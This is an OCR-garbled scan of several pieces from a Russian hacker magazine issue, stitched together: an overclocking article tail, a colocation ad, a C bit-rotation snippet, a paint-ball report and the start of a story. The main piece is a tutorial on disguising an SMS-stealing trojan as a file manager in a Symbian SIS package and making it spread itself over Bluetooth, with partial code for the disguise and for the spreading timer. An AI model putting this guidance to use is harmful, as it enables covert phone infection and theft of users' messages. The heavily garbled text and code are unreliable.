|||ВЕѲ!= РгеГСігІО) 
геіигп 0; 

// если программист забыл загрузить драйвер, 

// данная функция делает это самостоятельно 
Ц_996_ГіапсІІе =4 ІМѴАІ_Ю_НАІ\ЮІ_Е_ѴАШЕ) 

■няві 

// если загрузка драйвера провалилась, валим 
ІІ (_996_ГіапсІІе == І1ѴАиО_НАМОЕЕ^ѴАШЕ) 
геШгп 0; 

геіигп ОеѵісеІоСопігоІ (_996_ГіапсІІе, 
хСобе, &х,0, &х, 0, &х, 0); 

I 



Процедура закрытия драйвера должна 
просто вызывать СІозеНапсІІе, а все осталь- 
ное за нас сделает сам драйвер. В прочем, 
драйвер можно и незакрывать. При выходе 
из приложения операционная система сде- 
лает это автоматически. 



вер из памяти 

іпі _996_ехі1: () 

I 

11 (_996_бапбІе!#:4мѴА УРЦН А МРЕ Е_ѴАЕЦЕ) 

■ 

СІозеНапсІІе (_996_ГіапсІІе); 



геіигп 1 ; 

1 



А вот при снятии показаний со счетчиков 
производительности без ассемблера уже 
не обойтись! Для упрощения програм- 
мирования можно использовать ассемб- 
лерные вставки, хоть это и является при- 
знаком дурного тона, так как затрудняет 
перенос программы на другие платфор- 
мы и препятствует ее компиляции другим 
компилятором. Правильным решением 
было бы создание отдельного ассемблер- 
ного модуля, но это слишком хлопотно, тем 
более что мы пишем не коммерческую про- 
грамму, а всего лишь демонстрационный 
макет. 



нганпш 

І1 (_996_іпі1 ()==0) 

геіигп ргіті(»-ЕВВ: 996 бгіѵег поі ІоабесІ! \п » ) ; 

// ВЫБОР СОБЫТИЯ ДЛЯ МОНИТОРИНГА 
//И ЗАПУСК СЧЕТЧИКА 

_996_зеІесІ (ОСІІ_МІЗЗ_ОІЯЗТАІ\ЮІМС, РгеГСігІО); 




;// читаем регистр РгеГСігІО. . . 
тоѵ есх, РгеІСігІО 

;//. . . и помещаем результат в ЕОХ: ш 

^■ЕВВЭ 

;// сохраняем ЕОХ: ЕАХ в . . . 
тоѵ_есІх, есіх 

;//... одноименных переменных 
тоѵ_еах, еах 



// анализ кол-ва кэш-промахов 
;// отдаем остаток кванта и спим 
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Размещение оборудования в Москве 
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При снятии показани я со счетчиков производительности сле- 
дует учитывать, что они возвращают количество кэш-промахов с 
момента запуска счетчика, а не между двумя соседними замера- 
ми, так что дельту придется считать самостоятельно. И если эта 
дельта вдруг превысит некоторое пороговое значение (задава- 
емое настройками нашей программы), необходимо «притормо- 
зить» процессор, чтобы кэш чуть-чуть приостыл. А как это мож- 
но сделать? Ведь даже если материнская плата поддерживает 
изменение тактовой частоты процессора на лету, каждая из них 
делает это по-разному, и у нас получается громоздкая и не уни- 
версальная программа. 

На самом деле, нет ничего проще! Достаточно просто прекратить 
отдавать кванты, загрузив процессор «тупой» работой, не требу- 
ющей обращения к памяти. Например, складывать два регистра в 
цикле. При условии, что в системе имеются два активных потока, 
один из которых принадлежит приложению, гоняющему кэш и в 
хвост и в гриву, а другой — гоняет цикл в нашей программе, на 
однопроцессорных материях операционная система будет вы- 
делять приложению только 50% машинного времени, следова- 
тельно, нагрузка на кэш упадает. А если мы запустим три потока, 
мотающие такие циклы, кэш-приложение получит только 25% 
машинного времени! Количество протоков и продолжительность 
выполнения цикла подбираются экспериментально и для каждо- 
го приложения индивидуальны (а это значит, что для достижения 
наивысшей производительности придется отслеживать, какие 
приложения запущены, и выбирать соответствующий им про- 
филь). Муторно, конечно, но разгон того стоит: 

Цикл, отбирающий процессорные такты у приложения, напрягаю- 
щего кэш, и дающий ему время остыть 

ІМімвшіШ 

ш 

тіяш 

ІШіШ 



Остается разобраться с «загниванием» байтов в «застоявшейся» 
кэш-памяти. Тут все просто! Хотя мы и не можем непосредственно 
обновить ее содержимое, достаточно просто с некоторой перио- 
дичностью (определяемой, опять-таки, чисто экспериментально) 
загружать в кэш посторонние данные, например какой-нибудь му- 
сор, заставляя приложение заново перечитывать оригинальное 
содержимое из оперативной памяти. Учитывая, что пропускная 
способность современных ОРАМ-контроллеров измеряется ги- 
габайтами в секунду, особого падения производительности это 
не вызовет, зато позволит разогнать процессор до сумасшедших 
тактовых частот! 

□ Заключение 

Разгон — дело рискованное, можно не только потерять данные на 
жестком диске, но и вывести из строя процессор, а то и всю ма- 
теринскую плату. Тем более что таковая частота в большинстве 
случаев не является самым «узким» местом, и разгон носит ско- 
рее спортивный интерес. П-Е 




Что такое размещение сервера (со-Іосаііоп) ? 
Со-Іосаііоп — это размещение Вашего сервера на 
площадке (в дата-центре) провайдера, в 19" стойке 
(гаек). Услуги по размещению сервера (соііосаііоп), 
включают наличие основного и резервного электро- 
питания, контроля температурно-влажностного 
режима, системы автоматического газового пожаро- 
тушения, ограничение доступа к Вашему оборудова- 
нию, наличие быстрых основного и резервного 
интренет-каналов, сохранность Ваших серверов, 
и опционально — услуги по администрированию 
серверов. 

Вам либо будет предоставлен в аренду Интернет- 
канал гарантированной пропускной способности, 
либо будет предложено оплачивать трафик, при 
некоторых условиях трафик может быть бесплатный. 

Почему размещать оборудование у нас? 

— Мы размещаем оборудования в двух дата-центрах 
в Москве: дата-центре М9 и дата-центре СТЕК; 

— Мы обеспечиваем круглосуточный мониторинг 
работоспособности Ваших серверов; 

— Мы обеспечиваем Вам доступ к оборудованию по 
предварительной заявке; 

— Мы предоставляем подключение на скорости от 
ІООплЬрз до ІСЬрз; 

— Мы окажем Вам помощь в решении проблем. 



Какие преимущества услуги размещения сервера? 

Услуги по размещению серверов в дата-центрах 
включают множество преимуществ для владельцев 
сайтов, таких, как: 

— Полный контроль над серверами; 

— Для серверов специальные условия хранения 
и функционирования; 

— Серверы настолько быстры и производительны, 
как вы захотите, вы можете обновлять серверы; 

— Уменьшенная зависимость от услуг провайдеров, 
большинство задач администрирования и настроек 
можно проводить удаленно, значительная гибкость; 

— Возможность использовать имеющиеся серверы; 

— Построение собственных отказоустойчивых 
решений. 



ВЕСТ МТШС 



тел. (495) 788-94-84 
ѵѵѵѵѵѵ.Ье5І:-Ио5І:іпд.ги 




ЖЕЛАЕШЬ ПИСАТЬ ЭФФЕКТИВНЫМ КОД? ХОЧЕШЬ ПОЧЕРПНУТЬ ИЗ ГЛУБОЧАЙШЕГО КОЛОДЦА КОМПЬЮТЕРНОЙ МУДРОС- 
ТИ — МОЗГА МЫЩЬХА? ИНТЕРЕСУЕШЬСЯ ОПТИМИЗАЦИЕЙ АЛГОРИТМОВ? ТОГДА ТЫ ПОПАЛ ПО АДРЕСУ! БРОСАЙ СВОИ 
КОМПОНЕНТЫ, ФОРМЫ И ЧЕКБОКСЫ — ПРОГРАММИРУЙ ПО-МУЖСКИ! 



01 

Реализация Ю1/ЮЯ 

Огромным недостатком языка Си (отор- 
вать бы за него голову его создателям) 
является отсутствие операторов цикли- 
ческого битового сдвига, которые при- 
сутствуют практически на всех процессо- 
рах и без которых не обходится ни подсчет 
СРС32, ни вычисление корректирующих 
кодов Рида-Соломона, ни куча других по- 
добных алгоритмов. 

Некоторые программисты используют 
ассемблерные вставки, прибегая к непос- 
редственному вызову команд процессора 
(нах86 это ЯОЬ/ЯОЯ — циклический бито- 
вый сдвиг влево и вправо соответственно). 
Однако такое решение делает программу 
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непереносимой, причем совершенно не- 
оправданно непереносимой, поскольку 
циклический сдвиг элементарно реализу- 
ется стандартными средствами Си. 
Существует множество способов сделать 
это. Воттолько один из них. Не самый быс- 
трый, требующий двух дополнительных 
переменных (хотя, в принципе, можно 
обойтись и одной), зато наглядный и уни- 
версальный, то есть работающий с пере- 
менными любой разрядности: 

Реализация циклического сдвига влево 

Г здесь а — переменная, которую нужно сдвигать, п 
— на сколько разрядов сдвигать 7 
НОЦіпіа, іпіп) 

! 

іпШ , 12; 

//нормализуем п 
п = п % (зі2ео7а)*8); 

//двигаем а вправо на п бит, теряя старшие биты 
іі =а<<п; 

// перегоняем старшие биты в младшие 



12 = а >> (зігео^ (а)*8 — п); 

// объединяем старшие и младшие биты 
геШгп11І12; 

} 

Испытание обеих функций на прочность 

#беІіпе ѴАІ_ 0x12345678 

ргіпЩ"%ХИ %Х6 %ХГі\п", ѴАІ_, НОІ_ (ѴАІ_,8), НОН 
(ѴАІ_,8)); 

$123456786 345678126 781234566 

Этот алгоритм автоматически опреде- 
ляет разрядность аргумента а, поэтому 
функции ЯОЬ/ЯОЯ можно безболезнен- 
но преобразовать в макросы. Также 
можно реализовать универсальную 
функцию/макрос ЯОх, где направление 
сдвига задается значением аргумента п. 
Если он положительный — сдвигаем а 
вправо, вызывая ЯОІ_, если п отрица- 
тельный — сдвигаем а влево, вызывая 
ЯОЯ и передавая -1*п. 
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ІМИТРИЙ «ОЕМ@М» ТАРАСОВ 



ТРОЯН с синим 

ЗУБОМ 



КАК ХАКЕРЫ ВПАРИВАЮТ ЗЛЫЕ ПРОГРАММЫ ПО ВЮЕТООТН 

В СЕНТЯБРЬСКОМ НОМЕРЕ МЫ УЖЕ ПИСАЛИ О ТОМ, КАК ХАКЕРЫ СОЗДАЮТ ФУНКЦИОНАЛ 5М5-ТР0ЯНА ДЛЯ СМАРТФОНОВ 
НА БАЗЕ 5ѴМВІАКІ, КОТОРЫЙ СПОСОБЕН НЕЗАМЕТНО ДЛЯ ПОЛЬЗОВАТЕЛЯ СЛИВАТЬ НА НОМЕР ХАКЕРА ВХОДЯЩИЕ/ИСХОДЯЩИЕ 
5М5. МЫ ОБСУДИЛИ, КАК ВЗЛОМЩИКИ ДЕЛАЮТ ТРОЯНА НЕВИДИМЫМ В СИСТЕМЕ И ДОБИВАЮТСЯ ЕГО АВТОМАТИЧЕСКОГО 
ЗАПУСКА ПРИ СТАРТЕ ТЕЛЕФОНА. СЕГОДНЯ МЫ ПОСМОТРИМ, КАК МОЖНО ЗАМАСКИРОВАТЬ ЗВЕРСКИЙ СОФТ ПОД БЕЗОБИДНОЕ 
ПРИЛОЖЕНИЕ И ЗАСТАВИТЬ ЕГО САМОСТОЯТЕЛЬНО РАСПРОСТРАНЯТЬСЯ ЧЕРЕЗ ВШЕТООТН. 



а БѴБ к сентябрьскому номеру 
в ознакомительных целях была 
выложена заготовка програм- 
мы-шпиона, которая могла 
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прятаться в системе и автоматически запус- 
каться при старте телефона. Функционал, 
ответственный за отправку зпгіз, ты должен 
был реализовать сам, поскольку все, что 



для этого нужно было, — это перелопатить 
ѵѵѵѵѵѵ.сіізсиззіоп.іогит.покіа.сот . В этот раз 
на диске тебя ждет программа, способная 
отправлятьзтз. Такчто, если в прошлый раз 
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^ согііпд 



Мокіа Е70 



А ЭДпбгіУІ гГ-ёі^ йцрід ЫйІ Ііг ■ Ё» ейПГйЕЬліу 

эеЖп; сир №і Е 70 кеср? учм гі юосЬ ѵ^и'с упШѵ «і 
№ до* ТПе Мэім ЕТС >і Ьуй к* ішйгс» дача сэп №г 

■ьліЫйй т №№ібе ѢНЛ ЗнХЕІІ ’Й рй^Ѵ ЬКН» 
ІтЛ апо здеІыЭэта к п а&о э рдатоМ пс&чуи^в, 
йелсі ж.щкжівгц .И* >»ш еыіиаміу тя«гіі Шп 
ш&апсей ѵ?м* Ел АЛз ТЕ» ЫсИ» ЕЛ) г? йНк 

іп«і и^-чпсЕЙ ВЕГс™ѵД л Ш ^ЭгГрЬдп* ІВПСІ Ц; 
ІВМТІЧ5- л Уійе, Г^№ЕЯтгап ыгм^ ЬтсаА-тй акз 




сстесЕглІу. іх^г^иІіЬі % цчгІИ ризЬ кп а I ясй-Стэ . .где 



ЯТвоцвгу эп( | »Р(ЧМгёІ ЕК^Лу 



> А вот на этот смартфон трояна впаритьуже сложнее 



РЮКІА 



Л 



Оеѵеіоріпд 5егіеі 60 Арріісаіюп* * 

А Сиігіе Іог БушЬіап 05 С++ Оеѵеіорега 

— ЕгѴ> ЕАмгтН. №№4 ІМа М Пт МіЯ<* )Ш Мнкі 1 М 



ты по каким-то причинам не разобрался, как отсылать 
5ПГ15 с чужого смартфона, можешь заглянуть на ЭѴЭ к 
этому номеру. 

Функционал функционалом, но надо же как-то устано- 
вить программу в телефон жертвы. Вот о том, как это 
проще всего сделать, мы и поговорим. 

□ Возможности маскировки 

Как уже было сказано, при сборке инсталляционного 
файла для смартфона мы можем интегрировать не- 
сколько приложений в один зіз-файл. Для этого нужно 
добавить в ркд-файл строку: 

©"егЬооІ.зіз", (0x101 РОООО) 




ІДОИ МОНИ ЙГііійч* Ч*Д! 



> Отличная книга по программированию Зегіез 60 на 
английском. Мастхэв для любого ЗуплЬіап-разработ- 
чика. Можно заказать на оіоп.ги 







> Как всегда рекомен- 
дую чаще посещать 
Гі11р://ѵѵѵѵѵѵ.1огит.покіа. 
сот 



В данном случае мы добавляем в наш зіз-файл автостар- 
тер егЬооІ: ( НДр://ѵѵѵѵѵѵ.пеѵѵІс.сот ). о котором мы писали в 
сентябре. ОхІОІРЭООО — это ВІЮ приложения, получа- 
емый по запросу на зиррогі@зутЬіап.сот и служащий 
для уникальной идентификации приложения, подлежа- 
щего широкому распространению. Сам файл егЬооІ. 
зіз должен храниться в каталоге дгоир проекта. Теперь 
представь, что тебе надо замаскировать наш троян под 
безобидный файловый менеджер. Для этого добавляем 
в файл описания сборки строку, к примеру: 

@"еРІІеМап.зіз", (0x1 01 Р4284) 

Полученный зіз-файл содержит как этот самый фай- 
ловый менеджер, так и зтз-троян. Переименовываем 
его в еРіІеМап.зіз, и при установке в смартфоне ока- 
жутся обе программы. Теперь внимание — вопрос: 
«А как же мы узнали II Ю проги еРіІеМап?» Ріа нашем 
диске ты найдешь программу 818 Хріобе, показыва- 
ющую ВІЮ любого приложения под 8утЫап. Ею мы и 
воспользовались. 

□ Основы БутЬіап Соттипісаііоп Гипсіатепіаіг 

Смартфоны на базе 8утЫап, помимо голосовой связи, 
поддерживают следующие способы взаимодействия: 

• Зегіаі Сотгтпипіса^іоп — простое низкоуровневое 
взаимодействие между двумя девайсами, находящими- 
ся на близком расстоянии друг от друга. В 8егіез 60 оно 
может быть реализовано через ИК-порт и ЫиеіооФ. 

• 8оске*5 — высокоуровневое взаимодействие типа 
«точка-точка», которое может быть реализовано с по- 
мощью ТСР/ІР. 

• — без комментариев. 

• ВІиеЪэо^Ь — как известно, служит для тех же целей, 
что и I пТагесІ , но обеспечивает большее удобство 



взаимодействия. Этот метод мы и будем использовать. 
Для распространения злобных программ можно ис- 
пользовать разные методы. Но в том случае, когда тре- 
буется поразить как можно большее число аппаратов, 
целесообразнее использовать 8егіаІ Соттипісаііоп на 
основе ЫиеіооФ. 

□ Алгоритм распространения заразы 

Итак, пусть хакерская программка, установленная на 
телефон жертвы, каждые полчаса рассылает свою ко- 
пию по ЫиеІооФ. Для этого взломщику понадобится 
объект класса СРегіосІіс, служащий для выполнения 
однихитех же действий черезодинаковые промежутки 
времени. В хедер класса, ответственного за функцио- 
нал отправки Билз, он добавит объявление переменной 
таймера: 

СРегіосІіс* ІТІтег; 

И создаст объект: 

іТітег = СРегіосІіс:: І\ІеѵѵІ_ (-100); 

Здесь параметр І\ІеѵѵІ_ — приоритет Асііѵе Офесі, 
-100 — стандартное значение. 

Далее необходимо вызвать метод ЗІагі созданного 
объекта, и в целом код будет выглядеть следующим 
образом: 

сопзПТІтеІп1егѵаІМІсгоЗесопсІ532 КТІтегОеіау = 1800000000; 

// интервал времени в микросекундах. В данном случае 30 мин 
ІТітег = СРегіосІіс:: ЫеѵѵЦ-100); //создаем объект класса СРегіосІіс 
іТітег->5іаг1 (КТІтегОеіау, КТІтегОеіау, 

ТСаІІВаск (ТітегСаІІВаск, ІГііз));// запускаем таймер 




> Почитай книгу 
«Оеѵеіоріпд Зегіез 60 
Арріісаііопз». Авторы 
— І_еідИ Есіѵѵагсіз, 
НісбагсІ Вагкег 




> На компакт-диске 
лежат исходные коды, 
а также программа Зіз 
Хріобе. 
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«Разработчики девятой версии ЗутЬіап несколько подпортили ха- 
керам жизнь, пойдя на бескомпромиссный шаг ради обеспечения 
безопасности пользователей» 



В функции Зіагі первый параметр — время, 
через которое происходит первый запуск, 
второй — интервал между последующими 
запусками, а третий — функция, которая 
должна будет выполняться через каждые 
полчаса. 

Код этой функции выглядит примерно так: 

ТІпі СХаТгоі:: ТітегСаІІВаск (ТАпу* аРагат) 

1 

СХаТгоі * зеІТ = (СХаТгоі *) аРагат; 

//рассылаем троян ... 
геіигп КЕггЫопе; 

I 

Теперь необходимо реализовать класс, 
осуществляющий поиск доступных через 
ЫыеіооФі устройств и отправляющий им дист- 
рибутив с файловым менеджером. Делать это 
лучше всего, основываясь на готовом приме- 
ре ВІиеІооІЬСЬаЬ который можно скачать по 
адресу ИДр://Іогит.покіа.сот/таіп/рІа1Іогтз/ 
збО/Ьоокз. Ьіт1#сосІе или взять на нашем дис- 
ке. Там ты найдешь описание класса СВІиеіо 
оФЮеѵісеЗеагсЬег, служащего для поиска ус- 
тройств. Немного модифицировав его, можно 
добиться требуемой функциональности. 
Описание класса имеет следующий вид: 

сіазз СВІиеіооіГЮеѵісеЗеагсГіег: риЫіс САсІіѵе 

I 

риЫіс: 

зіаііс СВІиеІооІГЮеѵісеЗеагсГіег* |\ІеѵѵІ_ 
(МВІиеІооіГіОЬзегѵег&аВІиеІооіГіОЬзегѵег); 
зіаііс СВІиеіооіГіОеѵісеЗеагсГіег* І\ІеѵѵІ_С 
(МВІиеіооіГіОЬзегѵег&аВІиеіооіГіОЬзегѵег); 
-СВІиеіооіГіОеѵісеЗеагсГіег (); 

ргіѵаіе: //конструктор — 2 фаза 
СВІиеіооіГЮеѵісеЗеагсГіег 
(МВІиеіооіГіОЬзегѵег&аВІиеіооіГіОЬзегѵег); 
ѵоісі СопзІгисіЦ); 

ІІИІІІУІІИ : 

ѵоісі ОоСапсеІ (); // методы Асііѵе ОЬіесі — объекта 
риЫіс:// МетЬег Шпсііопз 
ѵоісі ЗеІесЮеѵісеЦ 

(ТВТОеѵісеВезропзеРагатзРскд&аВезропзе); 

// здесь можно расширить функционал в 
//зависимости от требований 

ргіѵаіе: // МетЬег Оаіа 
// необязательные параметры 
ТВТОеѵісеВезропзеРагатзРскд* ІВезропзе; 

// объект для поиска и фильтрации девайсов 
ВНозіВезоіѵег ІВезоіѵег; 



// сессия к ВІиеіооіЬ — серв ■ 

МВІиеіоо1:ГіОЬзегѵег& іОЬзегѵег; 

}; 

Как видишь, класс наследуется от САсііѵе, 
то есть представляет собой объект Асііѵе 
ОЬіесі. Это необходимо для реализации 
асинхронного вызова методов класса, 
длительность выполнения которых может 
быть довольно большой. Примером явля- 
ется поиск устройств, для которого есть 
2 способа: 

• Использование класса ВІМоііЯег, кото- 
рый предоставляет простейший доступ к 
ЫиеІооШ устройствам, находящимся в ра- 
диусе действия. Его плюс в простоте реали- 
зации, минус в том, что нельзя фильтровать 
девайсы. Ведь нет же смысла посылать про- 
грамму на мобильники, для которых она не 
предназначена, правда? 

• Использование класса ВНозШезоІѵег, 
предоставляющего большие возмож- 
ности для взаимодействия с доступными 
ЫиеіооіЬ-девайсами. 

В данном случае применим второй метод. 
Параметром конструкторов указанного 
классаявляетсяобъектМВІиеіооіЬОЬзегѵег, 
функции-члены которого нам предстоитоп- 
ределить самостоятельно. 

Прототип его выглядит следующим образом: 

і 

ИьііІ 

ѵігіиаі ѵоісі ЗегѵегЗіаДесИ () = 0; 

ѵігіиаі ѵоісі СоппесІесИ () = 0; 

ѵігіиаі ѵоісі НапсНеЕггогЬ (ТІпі аЕггогСосІе) = 0; 

ѵігіиаі ѵоісі ОеѵісеЕоипсІІ- (ТІпі аНезиіі) = 0; 

}; 

Назначения этих функций, думаю, понятны 
из их названий:). После реализации этих 
классов можно перейти непосредственно к 
созданию функционала, ответственного за 
посылку файла через ЫиеІооІЬ. Поиск де- 
вайсов осуществляем так: 

ѵоісі СХаТгоі:: ЕіпсІРіетоіеОеѵісеІ- () 

і 

ЮеѵісеЗеагсГіег = 

СВІиеІооІЬОеѵісеЗеагсЬег:: Ые\л/І_ (ЧГііз); 
ЮеѵісеЗеіесІіопРіезропзе = 
пе\л/ (ЕЬеаѵе) ТВТОеѵісеНезропзеРагатзРскд (); 
ЮеѵісеЗеагсИег->ЗеіесЮеѵісеІ_ 
(*ЮеѵісеЗеІесііопВезропзе); 

I 



Вызов этой функции можно добавить в ре- 
ализацию ТітегСаІІВаск, о которой говори- 
лось выше. Для более полной картины смот- 
ри исходник. 

В результате программа каждые полчаса 
будет пытаться рассылать свою копию на 
доступные устройства при условии, что 
ЫиеіооІЬ на смартфоне жертвы включен. По- 
этому, чтобы пользователь пораженного уст- 
ройства не удивлялся аварий ному закрытию 
какой-то непонятной программы, нужно реа- 
лизовать обработку ошибки соединения. 

□ Кому патрон? 

Прога запустится на всех смартфонах 60-й 
серии всех версий, кроме 3.0. Разработчики 
девятой версии ЗутЬіап несколько подпор- 
тили хакерам жизнь, пойдя на бескомпромис- 
сный шаг ради обеспечения безопасности 
пользователей. 

Весь софт, написанный для более ранних 
версий ЗутЬіап (6.1 , 7.0, 8.0), не будет рабо- 
тать на новых мобилках. Можно, конечно, 
перекомпилировать существующий код с 
использованием ЗЭК 3.0, но новая система 
контроля девятой ЗутЬіап обязательно на- 
пишет пользователю, какие АРІ использует 
наша программа! Представь себе такую 
ситуацию: пользователь устанавливает 

наш файловый менеджер, а телефон ему 
сообщает, что этот самый файловый ме- 
неджер использует функции для отправки 
зтз! Если пользователь не идиот (правда, 
многие пользователи являются идиотами:). 
— Прим, редактора), он отменит установку. 
Кроме того, по умолчанию новые смарты 
могут устанавливать только зутЬіап-зідпесІ 
ПО, которое проходит проверку. Подроб- 
нее об этом можешь прочитать на форуме 
ѵѵѵѵѵѵ.сІиЬбО.ога. 

О Вместо заключения 

Итак, как видишь, новые технологии предо- 
ставляют большие возможности для всяких 
нехороших личностей. Из личной практики: к 
одному моему знакомому на днях обратился 
товарищ с просьбой написать программку, 
рассылающую зтз определенного содер- 
жания на определенный короткий номер. Ви- 
димо, заказчикбыл владельцем этого самого 
короткого номера и срубал бабло с каждой 
отправленной на него зтз. Поэтому я тебе 
советую, во-первых, внимательней отно- 
ситься к программам, которые ты ставишь 
себе на мобилу, а во-вторых, не применять 
этот материал в незаконных целях. □□ 
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КАК ЧИТАТЕЛИ НАДРАЛИ НАС В ПЕЙНТБОЛ 

'.ТО ГОДА ЗАДАЛАСЬ С САМОГО УТРА: ПОХОЛОДАЛО, И В ВОЗДУХЕ ЗАКРУЖИЛ ИСЬ ОСЕННИЕ КОЛ ЮЧЖ КУСКИ СНЕГА, СДОБРЕННЫЕ 
МЕЛКИМ ДОЖДЕМ. ЗА ЭТИМ ПРИРОДНЫМ КАТАКЛИЗМОМ БЫЛО БЫ ОЧЕНЬ ПРИЯТНО НАБЛЮДАТЬ, ПОПИВАЯ УТРЕННИЙ ГРОГ В 
ТЕПЛОМ БАРЕ, НО ОТСТУПАТЬ НИКТО НЕ'СО.БИРАЛСЯ. ВЕДЬ БЫЛО ЗАРАНЕЕ ОБЪЯВЛЕНО: 1 % ОКТЯБРЯ РЕДАКЦИЯ «X» БЕССТРАШНО 

' БРОСАЕТ ВЫІОВ ЧИТАТЕЛЯМ, ПРЕДЛАГАЯ СРАЗИТЬСЯ В ПЕЙНТБОЛ. 

^ ^ * - 



17 ФАКТОВ О ПЕЙНТБОЛЕ 



войства шаров очень сильно зависят от боях нередко используют дымовые шаш- 
температуры и влажности: их надо пра- ки, гранаты и растяжки — взрываясь, они не 
вильно хранить, и для разных времен года по-детски хлопают и брызгают краской, 
используют разные шары. 

аксимальная прицельная дальность 
учше всего хранить шары при низкой в пейнтболе — примерно40метров 
влажности и при температуре 20 градусов. 

В этихусловиях они колятся лучше всего. пейнтбол-клубе «Гвардия» маркеры за- 

ряжают воздухом из баллонов, куда его 
США и Канаде производится 70% всех закачивают обычным дизельным компрес- 
шаров в мире. Всего в мире только 5 заво- сором, 
дов по производству шаров. 

а снятие маски на поле судья начисляет 
ар вылетает из ствола маркера со скоро- штраф 50 очков и может отстранить игрока 
стьюЗЗО км\час. от соревнований. 



аркер — пейнтбольное пневматическое 
ружье. Выстрел осуществляется при помо- 
щи сжатого газа из закрепленного на мар- 
кере баллона. 



идер — емкость, кудазапрявляются шары, 
Обычно влезает не больше 200 штук. 



грок считается убитым, если на его теле 
есть пятно краски большее пятирублевой 
монеты. 



а время боев с читателями мы выстрелили 
друг в друга 24 килограмма шаров, в кото- 
рых было примерно 11 литров краски. 



дин шар веситЗ грамма, диаметр — 0.64. 



0% попаданий в пейнтболе приходится на 
убитых игроков, которые покидают поле:). 



аксимальная скорострельность маркера 
— 13 выстрелов в секунду. 



ри попадании шара нередко он остается 
целым, не оставляя следа. 



ейнтбол появился в США около 20 лет на- 
зад. В России развивается с 1992 года. 
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ОВоттак 

На Ярославском вокзале всегда многолюдно. 
Бездомные мальчики с клеем «Момент» 
в слюнявых пакетах, бомжи на выходе из 
метро и похожие на серых клопов милли- 
ционеры, желающие срубить пару сотен 
с отбывающих в Архангельск пассажиров, 
создают крепкую массовку в любое время 
суток. Но утром 29 октября все было чуточку 
по-другому. Привычное течение дел наруша- 
ли десятка три молодых людей, которые сво- 
им внешним видом и поведением явственно 
отличались от остальных людей. Начать надо 
хотя бы с того, что в определенный момент 
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несколько парней отделились от общей груп- 
пы и сталиходитьповокзалус табличкой «ха- 
кер» и громко шептать окружающим слова: 
«Хакер! Пейнтбол!». Людей в Москве очень 
сложно чем-то удивить, но Степу и РогЬ’у это 
удалось. Усилия парней не прошли даром: 
уже через час группа читателей, объединен- 
ная с большей частью команды «X», подхо- 
дила к пейнтбол-клубу «Гвардия». 

В это время в самом клубе вовсю шла под- 
готовка к акции. Развешивались банне- 
ры журнала, и топилась печь в военной 
палатке под номером «2». Через полчаса 
начались бои. 



Получив под расписку нужное оборудова- 
ние и одев комуфляжи, мы разделились на 
4 команды: 

■ «ВАМ ХАНА!» — редакция «Хакера»; 
«РЕДБУЛ» — опытные читатели плюс 

наш РР-менеждер Илья (ламо); 

■ «Ч ИТЕРЫ» — читатели плюс наши неко- 
торыеавторы ; 

□ «ДОЛ БО#БЫ» — наши самокритичные 
читатели. 

Был сформирован небольшой турнир, в хо- 
де которого каждая из четырех команд сыг- 

ХАКЕР 1 1 /95/ 06 




БОЛЬШОЕСПАСИБО 

ВЫРАЖАЕМ БЛАГОДАРНОСТИ ПЕЙНТБОЛ- 
КЛУБУ «ГВАРДИЯ» [ ѴУѴУѴѴ.7827887.КЦ І ЗА 
ПЕРВОКЛАСНОЕ ПРОВЕДЕНИЕ БОЕВ, ИНТЕ- 
РЕСНЫЕ ИГРОВЫЕ ПЛОЩАДКИ, ДРУЖЕС- 
КУЮ АТМОСФЕРУ И ВСЕВОЗМОЖНУЮ ПО- 
МОЩЬВ ОРГАНИЗАЦИИ МЕРОПРИЯТИЯ. 
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рала по матчу с остальными. Бои прохо- 
дили на карте «Форт». Чтобы выйграть, 
нужно было первыми захватить флаг, 
находящийся в крепости, и оттащить 
его на свою базу. За это команде начис- 
лялось 50 очков — в 10 раз больше, чем 
за убитого врага. Ход игры расписывать 
особенно нет смысла: как и предполага- 
лось, читатели в нули вынесли редакцию 
«Хакера» :). В ходе турнира выйграли мы 
только 1 раз, и то — у «Долбо#бов» :). 
Круче всех выступили ребята из крас- 
ной команды, а вторыми стали желтые 
парни. 
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Следующим в наших боях стал настоящий 
сіеаііітаісіі на карте «Болото»: на этот раз 
никакого флага и стратегической задачи 
небылов помине. Нужнобылотупоубивать 
соперников, перебегая с одной болотной 
кочки на другую и укрываясь за разнооб- 
разными препятствиями. Надо сказать, 
тут был настоящий беспредел: все мочи- 
ли друг друга без остановки и оглядки на 
то, кто «убит», а кто нет. Здесь опять всех 
надрали красные. Впрочем, как и в следу- 
ющем раунде накарте «Шины» (маленькая 
карта с кучей укреплений из шин) и пов- 
торном соревновании на «Форте». 



ВБлижек пяти 

Времени на часах уже было ближе к пяти: 
снег не переставал идти, смеркалось, и все 
порядочно набегались и хотели есть. Поэто- 
му было решено завершить бои и отправить- 
ся в военную палатку с печкой, чтобы поесть 
там брутальных сосисок, которые голодные 
читатели решили даже не подогревать. Через 
час все натом же Ярославском вокзале мент, 
похожий насерого клопа, опять увидел стран- 
ную компанию людей. Они были довольны 
и почему-то измазаны краской. «Может, гас- 
тарбайтеры? Да нет, не похожи . . . » — подумал 
мент и отвернулся в другую сторону. И-И 
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ОДЕНЬ ПЕРВЫЙ 

Клим приоткрыл глаза и тут жѳ зажмурил- 
с ч —солнце было в самом зените и броса- 
ло сверху ослепляющие лучи. 

Он лежал на берегу, окруженном тропи- 
ческой растительностью и пальмами, 
а совсем рядом океанские волны ласкали 
белоснежный песок. Такие места он ви- 
дел только на обложках рекламных бро- 
шюр турагентств с подписью «Карибы» 
или «Канары». Но сейчас все было по-на- 
стоящему. Реальной была и тупая боль, 
сковавшая левую ногу. Клим осмотрел 
лодыжку и, увидев красочную ссадину, 
выругался. 

Как он попал сюда? Память стала посте- 
пенно возвращаться. Кругосветный круиз. 
Пассажирский лайнер «Святая Елена». 
Ужасный шторм. Кажется, они попали 
в центр торнадо. Треск, крики, сноп искр... 
дальше он помнил мало . 

Клим с трудом поднялся. Нога тут же отозва- 
лась новым приступом боли, но он мог идти. 
Прихрамывая, он побрел вдоль берега в по- 
исках любых зацепок, чего-нибудь, что могло 
указывать на крушение. Он прошел не мень- 



ше трех километров, пока не уперся в скалу, 
которая закрывала проход. Никаких следов. 
«В этих широтах много необитаемых ост- 
ровов. Рай для тех, кто хочет почувствовать 
себя Робинзоном», — вспомнил Клим слова 
капитана, сказанные им, когда они беседо- 
вали на верхней палубе. Во всяком случае, 
ему повезло, что этот клочок земли был не 
таким уж маленьким. А в том, что это именно 
остров, сомнений не было. 

Вернувшись обратно и пройдя с километр 
в другую сторону, Клим заметил вдали тем- 
